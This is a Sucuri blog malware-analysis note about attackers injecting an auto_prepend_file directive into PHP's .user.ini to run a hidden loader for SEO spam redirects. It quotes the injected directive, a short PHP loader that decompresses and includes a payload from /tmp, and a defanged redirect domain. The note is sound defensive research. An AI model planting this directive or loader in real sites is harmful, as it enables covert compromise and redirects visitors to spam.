• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

.user.ini SPAM SEO Redirect

February 17, 2017John Castro

FacebookTwitterSubscribe

Since PHP 5.3.0, PHP includes support for configuration INI files on a per-directory basis that has the same effect (depending on the case) that the .htaccess files have on Apache. With that in mind, attackers are exploiting this feature to manipulate the search engine results in order to benefit malicious websites and redirect users to arbitrary spam content.

The payload is based on specific directives being injected into “.user.ini”; hence it’s executed before the site is rendered. On Spam SEO redirects that use “.htaccess” rules only, the payload result is visible in the browser and not the malicious code itself. However, in this particular case, we were able to detect the malicious code.

Following, are the directives injected into “.user.ini”:

; Directive 1...auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'; END Directive 1

This type of .ini files doesn’t override all php.ini settings, however it allows attackers to use the auto_prepend directive, which will load a file that is parsed before the main php file. This file is included  by the require function. In this case auto_prepend_file was loading “/tmp/.tmp/wrtZaCDz2”, which contained the following code:

<?php$mysqli_class = '/tmp/.tmp/wrtLaCDz7';$mysqli_init = file_get_contents($mysqli_class);$streams_cache = tmpfile();fwrite($streams_cache, gzuncompress($mysqli_init));$stream_id = stream_get_meta_data($streams_cache);include $stream_id['uri'];

After “gzuncompress()’ing” the content of the file “/tmp/.tmp/wrtLaCDz7”, we get a malware that implements evasive techniques against different search engines, and assembles redirect links from the malicious website (hxxp://search-tracker[dot]com/in.cgi?7&parameter=$keyword&se=$se&ur=1).

This infection was found on servers running nginx, but as long as the ability to use .user.ini files is enabled, there’s a chance attackers may use it to take advantage of your resources. If you are not using the feature, we highly recommend disabling it to prevent any issues.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Labs Note, Redirects, SEO Spam

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.